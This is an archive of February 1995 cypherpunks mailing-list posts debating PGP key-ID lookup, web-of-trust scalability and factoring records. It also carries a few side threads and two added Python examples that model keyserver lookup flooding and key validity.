Subject: the problem that destroyed PGP
Message-ID: <9502120550.memo.29017@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Return-path: <peace@BIX.com>
Received: by bix.com (CoSy3.31.1.50) id <9502112132.memo.28092@BIX.com>;
 Sat, 11 Feb 1995 21:32:20 -0500 (EST)
From: peace@BIX.com
Date: Sat, 11 Feb 95 21:32:20 EST
To: cyperpunks@toad.com
Message-ID: <9502112132.memo.28092@BIX.com>
Subject: the problem that destroyed PGP

So finding a KeyID is the problem that destroys PGP eh?

Well I would just take that as the problem to solve, not a
reason to throw the baby out with the bath water.

All we need to do is design a distributed, hashed database.
Should be a piece 'o cake, right?

Let's see, first of all the problem is the receiver of a message
who gets just the KeyID.  First of all, the trusted keys should
be expected to be local (in some webby sense).  But let's assume
that the key is new, not in our local cache.  Now my scheme would put
a net of keyservers that ALL know each other.  The local environment
puts in a request to its usual keyserver.  That is the keyserver
that typically has the keys that the receiver is likely to trust.
Now it is certainly possible to imagine a case where a key is not
in the receiver's expected server, so what's next?  Well the 
keyserver knows ALL the other servers, right, so just copy the
original receiver's request to all the other keyservers.  If that
gets to be too big, just build a real net where every keyserver is
at most two hops away from any other one, then the intermediate
servers that could not honor the request would forward it to all 
the servers it knew.  I purposely propose that only two steps would
ever be necessary to limit the explosion, but I see that as no
real limitation, the rule could even be modified if there was
really any need.

Hey look, the net supports archie and a host of other non-structured
search mechanisms.  Why create a search hierarchy where such things
are not natural.  Why create a naming hierarchy where such things are
not natural.

By the way, the dockmaster.ncsc.mil note is a good example of a naming
hierarchy that has nothing to do with the employment of the person.
Anyone working in the security field can get an address there.  And
any member can get acm.org or ieee.org. But I can post from any of
there different net addresses which do not even agree at the very
most basic level.  So why would my KeyID be naturally associated with
any one of .net, .org or .com?

Peace ..Tom
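
The forwarding scheme described in the message above, as an added example that is not part of the original post. The server names, the key ID, the two topologies and the choice to count every request message sent are all constructed assumptions.

```python
"""Flooded KeyID lookup across keyservers with a hop limit (illustrative model)."""

KEY_ID = "0x1A2B3C4D"  # constructed key ID, not taken from any real keyring


def full_mesh(n):
    """n keyservers that ALL know each other; none of them holds KEY_ID."""
    names = [f"ks{i}" for i in range(n)]
    return {s: {"keys": set(), "peers": [p for p in names if p != s]}
            for s in names}


def two_level_net():
    """Home server ks0 knows three regional servers; each regional server
    knows ks0 plus three leaf servers. The key sits on leaf r2-b."""
    servers = {"ks0": {"keys": set(), "peers": ["r1", "r2", "r3"]}}
    for region in ("r1", "r2", "r3"):
        leaves = [f"{region}-{x}" for x in "abc"]
        servers[region] = {"keys": set(), "peers": ["ks0"] + leaves}
        for leaf in leaves:
            servers[leaf] = {"keys": set(), "peers": [region]}
    servers["r2-b"]["keys"].add(KEY_ID)
    return servers


def flood_lookup(servers, home, key_id, max_hops=2):
    """Return (holders, messages).

    holders:  servers reached by the request that hold key_id.
    messages: request messages sent, including the client's first request.
    A server that cannot honor the request copies it to every server it
    knows except the one it came from, until max_hops forwarding steps
    have been used.
    """
    messages = 1                    # client -> its usual keyserver
    seen = {home}                   # servers that already handled the request
    frontier = [(home, None)]       # (server, server it got the request from)
    for hop in range(max_hops + 1):
        holders = sorted(s for s, _ in frontier if key_id in servers[s]["keys"])
        if holders or hop == max_hops:
            return holders, messages
        next_frontier = []
        for server, came_from in frontier:
            for peer in servers[server]["peers"]:
                if peer == came_from:
                    continue
                # The sender cannot know whether the peer already received a
                # copy from someone else, so the message is sent regardless.
                messages += 1
                if peer not in seen:
                    seen.add(peer)
                    next_frontier.append((peer, server))
        frontier = next_frontier
    return [], messages


if __name__ == "__main__":
    net = two_level_net()
    print("two-level net, 2 hops:", flood_lookup(net, "ks0", KEY_ID))
    print("two-level net, 1 hop: ", flood_lookup(net, "ks0", KEY_ID, max_hops=1))
    mesh = full_mesh(50)
    print("50-server mesh, 1 hop:", flood_lookup(mesh, "ks0", KEY_ID, max_hops=1))
    print("50-server mesh, 2 hops:", flood_lookup(mesh, "ks0", KEY_ID, max_hops=2))
```

With the hop limit in force, an empty result only means the key was not within reach of the flood, and every miss costs the full fan-out in messages.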




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 06:50:56 PST
To: peace@bix.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <9502120550.memo.29017@BIX.com>
Message-ID: <9502121449.AA18809@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



peace@bix.com says:
> So finding a KeyID is the problem that destroys PGP eh?

No, it doesn't "destroy" it. PGP just needs a redesign to pass along
DNSable tags (like joe@some.domain.org) with keyIDs.

> Well I would just take that as the problem to solve, not a
> reason to throw the baby out with the bath water.

No one is proposing throwing it away. People are proposing small
changes to the format.

> All we need to do is design a distributed, hashed database.
> Should be a piece 'o cake, right?

No, we aren't going to do that, because it's an administrative
nightmare, and I can't imagine proposing such a thing with a straight
face at an IETF meeting.

> Hey look, the net supports archie and a host of other non-structured
> search mechanisms.

No, it doesn't. Archie is a piece of shit that can't find what I need
about two thirds of the time and is slow as molasses and cannot
scale. It was a nice idea but it's at the breaking point.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 12 Feb 95 10:20:57 PST
To: cypherpunks@toad.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121757.KAA12098@bogart.Colorado.EDU>
Message-ID: <199502121820.KAA04736@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"W. Kinney" <kinney@bogart.Colorado.EDU> writes:

>But web of trust _in and of itself_
>is not proving to be effective when applied to the problem of providing
>reliable key certification on the scale of the internet as a whole. 

Here is something I posted on this topic last year:

> From owner-cypherpunks@toad.com  Wed Mar 30 09:19:30 1994
> Date: Wed, 30 Mar 1994 09:17:40 -0800
> From: Hal <hfinney@shell.portal.com>
> Message-Id: <199403301717.JAA14861@jobe.shell.portal.com>
> To: cypherpunks@toad.com
> Subject: Web of Trust?
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Status: RO
> 
> One of the key concepts widely used to describe PGP is the "web of trust".
> This brings to mind a network of connections between people who know and
> communicate with each other.  Two people who want to communicate can do
> so securely if there is a path of connections in the form of signed keys
> that joins them.
> 
> But this is not quite right.  The fundamental fact about PGP key signatures,
> which is often misunderstood, is this:
> 
> You can only communicate securely with someone whose key is signed by a person
> you know, either personally or by reputation.
> 
> In other words, if I want to communicate with joe@abc.com, I can only do so
> if one of the signators of his key is a person I know.  If not, I have no way
> of judging the validity of his key.
>  
> This belies simple interpretations of the "web of trust".  I may have signed
> A's key, A has signed B's, B has signed C's, C has signed D's, and D has signed
> Joe's, but this is of no value unless I know D.  Only then can I trust Joe's
> key.
> 
> This means that, in the "web" picture, I can only communicate securely with
> people who are at most two hops away in the web of connections.  I can
> communicate with the people I know, and I can communicate with the people they
> know, and that is it.
> 
> This is unfortunate, because the simple web model ties into some famous
> research which suggests that any two people chosen at random are only about
> half a dozen steps apart in the web of who-knows-whom connections.  (This
> result is where the title of the movie "Six Degrees of Separation" comes from.)
> If you had a system which actually supported communications via such a web
> model, it actually would have hope of letting two people communicate who did
> not have a very long chain between them.  But PGP, with a maximum chain length
> of two, will not allow this.
> 
[Discussion of possible extensions elided]
> 
> Without this, I think we will continue to have problems with PGP being unable
> to validate keys of people we want to communicate with.  People will collect
> huge laundry lists of signatures in the hopes that whoever wants to
> communicate with them will know one of those people.  Centralized key validators
> will appear (as in the case of the SLED service being started now, which will
> sign a key based on a signed check with your name on it).  The result may be
> a choice between using an unsigned key or using one signed by some faceless
> bureaucracy, which is no better than the original PEM conception.
> 
> (People may be confused by this essay because they thought PGP worked this
> way already.  PGP does have a follow-the-web model, but that is only for
> following signatures.  In the example above, where I wanted to talk to Joe
> and there was a chain to him through A, B, C, and D, we have to first
> suppose that I know and trust all of A, B, C, and D.  Given that, what PGP can
> do is to determine whether I have valid keys for all of those people.  It will
> notice that A has signed B's key, so it is valid.  I know B and told PGP he
> was trustworthy, and he signed C's key, so therefore that one is valid.
> Similarly, I know C and I know D so PGP can follow the chain through them.
> Finally we come to Joe, whom I don't know, but because I know D and PGP followed
> the web to determine that D's key is valid, PGP can determine that Joe's key
> is valid.  But again, that was only because I knew D and everyone else in
> the chain.  The bottom line is still that I can only communicate with people
> who know someone I know.)
>  
> Hal
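
The chain through A, B, C and D from the essay above, as an added example that is not part of the original post. It uses a simplified model that is an assumption here: every introducer I trust is fully trusted and a single signature from one is enough; the keys X and Y are a constructed "island" with no signature path to me.

```python
"""Key validity versus mere signature connectivity in a web of trust."""
from collections import deque

# Constructed sample: signer -> owners whose keys that signer has signed.
SIGS = {
    "me": {"A"},
    "A": {"B"},
    "B": {"C"},
    "C": {"D"},
    "D": {"Joe"},
    "X": {"Y"},          # island: no chain of signatures leads here from me
}


def valid_keys(me, signatures, trusted):
    """Keys accepted as valid: my own key, plus any key signed by a key that
    is itself valid AND whose owner I have marked as a trusted introducer."""
    valid = {me}
    queue = deque([me])
    while queue:
        signer = queue.popleft()
        if signer != me and signer not in trusted:
            continue     # key is valid, but its signatures carry no weight
        for subject in signatures.get(signer, ()):
            if subject not in valid:
                valid.add(subject)
                queue.append(subject)
    return valid


def chain_connected(me, signatures):
    """Keys joined to me by some chain of signatures, ignoring trust."""
    seen = {me}
    queue = deque([me])
    while queue:
        signer = queue.popleft()
        for subject in signatures.get(signer, ()):
            if subject not in seen:
                seen.add(subject)
                queue.append(subject)
    return seen


def untrusted_links(me, target, signatures, trusted):
    """Owners on the shortest signature chain from me to target whom I have
    not marked as trusted. Returns None when no chain exists at all."""
    parent = {me: None}
    queue = deque([me])
    while queue:
        signer = queue.popleft()
        if signer == target:
            break
        for subject in sorted(signatures.get(signer, ())):
            if subject not in parent:
                parent[subject] = signer
                queue.append(subject)
    if target not in parent:
        return None
    chain = []
    node = parent[target]
    while node is not None and node != me:
        chain.append(node)
        node = parent[node]
    chain.reverse()
    return [owner for owner in chain if owner not in trusted]


if __name__ == "__main__":
    for trusted in ({"A", "B", "C", "D"}, {"A", "B", "C"}, {"D"}, set()):
        ok = "Joe" in valid_keys("me", SIGS, trusted)
        gaps = untrusted_links("me", "Joe", SIGS, trusted)
        print(f"trusted={sorted(trusted)}: Joe valid={ok}, must also trust {gaps}")
    print("connected by signatures:", sorted(chain_connected("me", SIGS)))
```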




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sun, 12 Feb 95 08:27:13 PST
To: cypherpunks@toad.com
Subject: Q: ref. for DNA used to solve math. network prob. (fwd)
Message-ID: <199502121623.KAA00375@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
 
> Message-Id: <m0rdRDS-0005iFa@hip-hop.hh.sbay.org>
> Date: Sat, 11 Feb 95 15:27 PST
> From: jwgruber@aol.com (JWGruber)
> Subject: Q: ref. for DNA used to solve math. network prob.
> Designated-To: Internet Amateur Mathematics Society
> 
> Hi - I am looking for a reference (newspaper or popular magazine) on a
> recent article that described the use of DNA and genetic expression to
> solve a complex mathematical problem (linear algebra-matrix systems I
> believe) regarding a network of paths or routes between cities. Does
> anyone have a reference on this work ? I would be greatly obliged if I
> could receive a note on this. Thank you !
> John W. Gruber
> Philadelphia College of Pharmacy & Science
> JWGruber@aol.com
>
Only peripherally related to crypto but has anyone got any info on this?

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 12 Feb 95 09:57:47 PST
To: cypherpunks@toad.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121727.MAA20000@crypto.com>
Message-ID: <199502121757.KAA12098@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:

> I don't think anyone has suggested there's any one problem that
> "destroys" PGP.  Several people have pointed out a number of problems
> that limit PGP's scalability in various ways.  Its flat key ID
> namespace is one.  Lack of functional modularity is another.  Its
> fixed certification model is still another. 

Certification really does need to be added to the discussion on scaling.
In the sense that I want to be able to download a stranger's key from 
a key server and have some idea of its reliability, web of trust has
turned out to be a real failure, IMO. There's no "web", rather a large
set of disconnected "islands" of signatures. I'm looking at the latest
keyring from MIT right now, and noticing that most of the keys are
either unsigned or self-signed. The majority of the rest have signatures,
but signatures that are unconnected to me via the web of trust, so that
they are entirely useless. I suspect that my situation is by far the
most common one: the only keys that I have any verifiable authentication
for are ones I've signed myself, or ones that are signed by people 
in my immediate circle. The chain of signatures dies very close to me.

This isn't a criticism of PGP's key certification paradigm -- PGP allows
centralized certification (I see a few keys signed by SLED, for instance),
and it also allows me the flexibility of having mutual certification within
the circle of people I mail regularly. But web of trust _in and of itself_
is not proving to be effective when applied to the problem of providing
reliable key certification on the scale of the internet as a whole. 


                                  -- Will



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 12 Feb 95 10:10:30 PST
To: perry@imsi.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <9502121802.AA19017@snark.imsi.com>
Message-ID: <199502121810.LAA12147@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:

> I think the jury is still out on that. Web-of-trust is still really
> untested because of the difficulties in widespread deployment of
> PGP. As it stands, PGP is still a hacker's toy -- the lack of a

Perhaps you're right. Your argument here, as I see it, is that web-of-trust
becomes _more_ functional as it becomes adopted on a larger scale. This
might end up being true and it might not, although there seems to be
no evidence as of yet of increasing "connectivity" of signatures as PGP
becomes more widely used, which was the point I was trying to make. The
unresolved question is whether or not there will be a critical point at
which the web will become widely connected. The answer does not seem at
all clear to me.

                               -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 12 Feb 95 11:19:25 PST
To: cypherpunks@toad.com
Subject: Design my protocol
Message-ID: <v01510100ab640747eb76@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a question for all the gurus out there: I work for a company that
manufactures a new concept in telephony hardware. The system we developed
essentially replaces PBXs with an off-the-shelf computer, some special
cards, and some software. Our system will offer all the features that you'd
expect from current PBXs, such as least cost routing, as well as other
features that can't be provided by a standard PBX.

When a customer sets up a site, the system connects via a modem to our
server, from which the system retrieves software, routing tables, etc. We
also offer periodic software updates, and software based add-on features
for an additional fee. We would like to be able to upgrade, and in some
cases control, the sites by remote and we would like the customer to be
able to purchase extra software from us via modem or over the net. We use
TCP/IP and SNMP to communicate with the sites. We want to include strong
crypto from the beginning for several purposes:

-Link encryption between the customer sites and us.
-Authentication of the upgrade software.
-Secure purchases and transmission of software both via dial-up and the Internet.
-Optional encryption of the (telephony) data carried between sites.

I understand that the last issue is somewhat different from the others, I
just mentioned it to complete the picture. For now I need a solution for
the first two or three questions. We need something that can be delivered
to the customer six months from now, not something that may make it out of
a standard committee years from now.

Thanks in advance,


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 12 Feb 95 09:25:57 PST
To: peace@bix.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <9502120550.memo.29017@BIX.com>
Message-ID: <199502121727.MAA20000@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



Peace@BIX.com writes:
>So finding a KeyID is the problem that destroys PGP eh?
>
...

I don't think anyone has suggested there's any one problem that
"destroys" PGP.  Several people have pointed out a number of problems
that limit PGP's scalability in various ways.  Its flat key ID
namespace is one.  Lack of functional modularity is another.  Its
fixed certification model is still another.  There are more, and
no doubt still others waiting to be discovered as the user base
grows.  Any secure communications system that aspires to large-scale
penetration, whether called "PGP" or something else, will have to
tackle these kinds of issues before it will be successful.  Some
of the issues are obvious, while others only become apparent after
some experience.  Scale, after all, has a way of turning easy
problems into surprisingly hard ones.

For whatever reason, PGP has attracted an almost cult-like following,
and this has so far helped the spread of secure email.  But this
cuts both ways; cult status or not, PGP has to continue to evolve
and adapt to large-scale, mainstream demands by applying the lessons
of other big systems.  If it doesn't, rest assured that companies
like Microsoft and AT&T will do just fine with whatever they decide
the market wants.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 12 Feb 95 11:33:39 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121820.KAA04736@jobe.shell.portal.com>
Message-ID: <199502121933.MAA12403@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney writes, in regard to web-of-trust:

> But this is not quite right.  The fundamental fact about PGP key signatures,
> which is often misunderstood, is this:
> 
> You can only communicate securely with someone whose key is signed by a person
> you know, either personally or by reputation.
> 
> In other words, if I want to communicate with joe@abc.com, I can only do so
> if one of the signators of his key is a person I know.  If not, I have no way
> of judging the validity of his key.

There are, however, degrees of certainty here. The only person I trust
implicitly to sign keys is myself. If I have a key which is separated from
me by more than one hop in the web of trust, but still connected to me
via a chain of signatures, I have more certainty that this key is valid
than I do for an unsigned key. Granted, if I don't know the actual signator
of a particular key, my level of trust in the key's validity is pretty
low, but it's nonzero as long as it's connected by a chain of signatures.
The ease of mounting of a man-in-the-middle attack decreases with increasing 
signature connectivity, no?

Of course, the reality is that use of totally unverified PGP keys is
widespread, even among people who are well educated on the subject. This
is not a good thing in the long run.


                                  -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 10:03:08 PST
To: "W. Kinney" <kinney@bogart.colorado.edu>
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121757.KAA12098@bogart.Colorado.EDU>
Message-ID: <9502121802.AA19017@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"W. Kinney" says:
> This isn't a criticism of PGP's key certification paradigm -- PGP allows
> centralized certification (I see a few keys signed by SLED, for instance),
> and it also allows me the flexibility of having mutual certification within
> the circle of people I mail regularly. But web of trust _in and of itself_
> is not proving to be effective when applied to the problem of providing
> reliable key certification on the scale of the internet as a whole. 

I think the jury is still out on that. Web-of-trust is still really
untested because of the difficulties in widespread deployment of
PGP. As it stands, PGP is still a hacker's toy -- the lack of a
library or an easy to use global key distribution infrastructure mean
that we have yet to see what can be done. I think that mutually
authenticating organizations with small trust pyramids within the
organizations, but without a global key pyramid, may come to prove
very practical.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sun, 12 Feb 95 10:23:14 PST
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <Pine.SOL.3.90.950210075752.11373A-100000@use.usit.net>
Message-ID: <199502121822.NAA06249@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Any punishment on the books for police who knowingly violate the law seems
pointless, since they can technically be prosecuted for violating civil
rights anyway.  As it is, juries tend to believe police testimony no matter
what side they are on (prosecution or defense).

It's rare that police are prosecuted for brutality cases, and corruption
trials fizzle out because of the "blue wall" effect.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Sun, 12 Feb 95 10:40:09 PST
To: kien@MINERVA.CIS.YALE.EDU
Subject: Privacy digest an all
Message-ID: <Pine.SUN.3.91.950212133556.11884A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


I found this on another list that I'm on.  I have no connection at all 
with the distributor, but I thought that it would be interesting to share 
it with the list.

Ben.

________


1.  New Publication: PRIVACY & GEMS: HOW TO AVOID THE PRIVACY INVADERS
We all have something to hide, right?  From nosy neighbors, burglars, our
spouses, private detectives, but most of all the government and business.
In this 38-page booklet, you will  learn how the government and business,
through the extensive use of super-computers, is compiling data on every
facet of your life.  Discover exactly how they do it.  The amount of
information kept on you is astounding: bank statements, investments,
credit histories, medical records, school transcripts, driving histories,
videotape rentals, retail purchases, tax returns, legal records, and more!
This booklet explains who is collecting information on you and what they
are doing with it.  Your dossier is compiled and sold without your
permission or knowledge.  Find out what technologies are available today,
and their frightening implications for tomorrow.  We are on the verge of a
1984 Orwellian-type Police State!

How can you keep some of your life private?  After you read this booklet,
at least you will have some idea! Learn how to make untraceable telephone
calls.  Be prepared for the New Money.  There are a few low-profile
investments that do not generate reports to business or government.  Learn
what they are and how to go about protecting yourself from the privacy
invaders.  Once you have shifted some of your assets from high-profile
assets to low-profile assets, learn how to store and conceal them so you
will not be discovered.  Subjects covered include:
Why Privacy?, Political Persecution, High-Risk Business, Divorce, Probate,
Protection from Robbery, Protection from Government Seizure, The Future:
The Total Surveillance State, "Smart Cars", "Smart Cards", "Video
Surveillance", "Satellite, Surveillance", "Clipper Chip", "Robot Spies", The
Future Workplace:  A Look At Electronic Banking System, Inc., How Profiles
Are Created, Damaging Dossiers, Privacy And The  Telephone, The New Be A
Private Investor, An Analysis Of Low-Profile Investments, Diamonds and
Precious Gems, Rare Coins, Foreign Currency, Collectibles, 
Cash, The Tangible Investment Philosophy, Recent DeBeers Diamond Price
Hikes, Long Term Investment Gem Performance, Low-Profile Strategies In A
High-Profile World, Confidential Model Portfolio For Privacy Clients, 10
Rules For Gem Investing, How To Safeguard Your Valuables.  This is an
excellent tool for anyone concerned with our vanishing privacy.  Here is how
you order:  Send $9.95 ppd (includes first class postage). Illinois
Residents add 6.5% sales tax.  to: Superior Broadcasting Company, Box 668,
Lindenhurst, IL 60046.  Request #119O  "Privacy & Gems: A Special Report by
Bob Genis"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 12 Feb 95 12:33:25 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <0jCxBn=0Eyt5AxShYL@nsb.fv.com>
Message-ID: <9502122031.AA23722@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Fri, 10 Feb 1995 15:58:27 -0500 (EST)
    From: Nathaniel Borenstein <nsb@nsb.fv.com>
    
    Well, I have no idea why you think that MIME is an "atrocity" or
    "slime", but it is perfectly clear that you have no idea what it
    actually *is*, since "X-" headers have nothing whatsoever to do with
    MIME.  The "X-" headers are defined by RFC 822, which has been the
    standard for Internet mail formats since 1982.

You base a large conclusion on a small piece of data in combination
with some poor deduction.  Unless you are claiming that MIME violates
RFC 822 with respect to the handling of X- headers you have made a
number of false claims in the paragraph above.
    
    Perhaps you should learn what MIME is before you embarrass yourself
    further.

Unless it has changed radically in the 6 months since I read all of
the RFCs that were then available (I believe that rtfm.mit.edu was my
source at the time), then I have already taken the step that you
suggest -- in fact, it is largely what caused me to form the opinions
that I have with respect to MIME.  It is possible for someone to find
ugliness where you find beauty without them necessarily being
uninformed.

I must admit that Perry's references to secure multi-parts make me
think that another review is in order.  I'm certainly not an expert,
but then nothing in what was readily available provided much
encouragement for further exploration.  However, I have learned enough
of what MIME is that I am not embarrassed by your incorrect inferences.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sun, 12 Feb 95 12:55:43 PST
To: jwgruber@aol.com
Subject: Re: Q: ref. for DNA used to solve math. network prob. (fwd)
In-Reply-To: <199502121623.KAA00375@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.950212154435.623A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Feb 1995, root wrote:

[forwarded note from jwgruber deleted]

> >
> Only peripherally related to crypto but has anyone got any info on this?
> 

Here is the reference; additionally, there is a nice News & Views article 
on pages 993-994 of the same issue.

Author   Adleman LM. 

Title    MOLECULAR COMPUTATION OF SOLUTIONS TO COMBINATORIAL PROBLEMS.
   
Source   Science.  266(5187):1021-1024, 1994 Nov 11.

Abstract
    The tools of molecular biology were used to solve an instance of 
the directed Hamiltonian path problem. A small graph was encoded in 
molecules of DNA, and the ''operations'' of the computation were performed 
with standard protocols and enzymes. This experiment demonstrates 
the feasibility of carrying out computations at the molecular 
level.  

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 12 Feb 95 17:09:06 PST
To: cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <Pine.3.89.9502121608.A20084-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Zachary <zachary@pentagon.io.com> wrote:
 Most cryptosystems that we seem to use are based
on the assumption that factoring large numbers is a Hard Problem.  Isn't
this putting all our eggs in one basket?  Are there other Hard Problems
crypto systems can be based on?

There is of course the discrete log problem - DH and all that.

Unfortunately, although the discrete log problem has not been
shown to be equivalent to the factoring problem, every 
factoring advance immediately leads to a corresponding
discrete log advance and vice versa, and the two problems
take a very similar length of time to solve, suggesting
that the two problems have some deep equivalence.

So far no one has found a way of applying NP problems to
Crypto.

And that pretty much wraps it up.

There are of course a lot of hard problems that are not NP,
yet probably take exponential time, but obviously you
want a well understood problem that is part of conventional
mathematics.

This narrows the field rather drastically.

Discrete log and factoring pretty much covers it.

Of course you can do discrete log on weird fields -- there
is a lot of research in that which I do not understand at all.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 12 Feb 95 17:13:08 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <ab645cdf0102100421a7@[132.162.201.201]>
Message-ID: <Pine.3.89.9502121727.A20084-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Feb 1995, Jonathan Rochkind wrote:
> Keep in mind that it's been mathematically proven that factoring is
> NP-complete.  That is, it's in the set of problems including such things as
> discrete logs and the travelling salesman problem, such that if a
> polynomial time solution is found to _any_ of these problems, one can be
> found for all of them.

This is news to me!

I am fairly sure that factoring and discrete log are *not*
NP complete, and indeed there is no known way to use
NP complete problems for crypto.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schneier@chinet.chinet.com
Date: Sun, 12 Feb 95 15:39:37 PST
To: cypherpunks@toad.com
Subject: Factoring - State of the Art and Predictions
Message-ID: <m0rdnqt-000k5xC@mailbox.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


((Comments are appreciated.  -Bruce))


Factoring large numbers is hard.  Unfortunately for algorithm
designers, it is getting easier.  Even worse, it is getting
easier faster than mathematicians expected.  In 1976 Richard Guy
wrote: "I shall be surprised if anyone regularly factors numbers
of size 10^80 without special form during the present century." 
In 1977 Ron Rivest said that factoring a 125-digit number would
take 40 quadrillion years.  In 1994 a 129-digit number was
factored.  If there is any lesson in all this, it is that making
predictions is foolish.

Table 1 shows factoring records over the past dozen years.  The
fastest factoring algorithm during the time was the quadratic
sieve.

         Table 1:  Factoring Using the Quadratic Sieve

         year     # of decimal               how many times harder to
                  digits factored            factor a 512-bit number
         1983     71                         > 20 million
         1985     80                         > 2 million
         1988     90                         250,000
         1989     100                        30,000
         1993     120                        500
         1994     129                        100

These numbers are pretty frightening.  Today it is not uncommon
to see 512-bit numbers used in operational systems.  Factoring
them, and thereby completely compromising their security, is well
in the range of possibility: A weekend-long worm on the Internet
could do it.

Computing power is generally measured in mips-years: a one-
million-instruction-per-second computer running for one year, or
about 3*10^13 instructions.  By convention, a 1 mips machine is
equivalent to the DEC VAX 11/780.  Hence, a mips-year is a VAX
11/780 running for a year, or the equivalent.

The 1983 factorization of a 71-digit number required 0.1 mips-
years; the 1994 factorization of a 129-digit number required
5000.  This dramatic increase in computing power resulted largely
from the introduction of distributed computing, using the idle
time on a network of workstations.  The 1983 factorization used
9.5 CPU hours on a single Cray X-MP; the 1994 factorization used
the idle time on 1600 computers around the world for about 8
months.  Modern factoring methods lend themselves to this kind of
distributed implementation.

The picture gets even worse.  A new factoring algorithm has taken
over from the quadratic sieve: the general number field sieve. 
In 1989 mathematicians would have told you that the general
number field sieve would never be practical.  In 1992 they would
have told you that it was practical, but only faster than the
quadratic sieve for numbers greater than 130-150 digits or so. 
Today it is known to be faster than the quadratic sieve for
numbers well below 116 digits.  The general number field sieve
can factor a 512-bit number over 10 times faster than the
quadratic sieve.  The algorithm would require less than a year to
run on an 1800-node Intel Paragon.  Table 2 gives the number of
mips-years required to factor numbers of different sizes, given
current implementations of the general number field sieve.

         Table 2: Factoring Using the General Number Field Sieve

         # of bits         mips-years required to factor

         512               30,000
         768               2*10^8
         1024              3*10^11
         1280              1*10^14
         1536              3*10^16
         2048              3*10^20

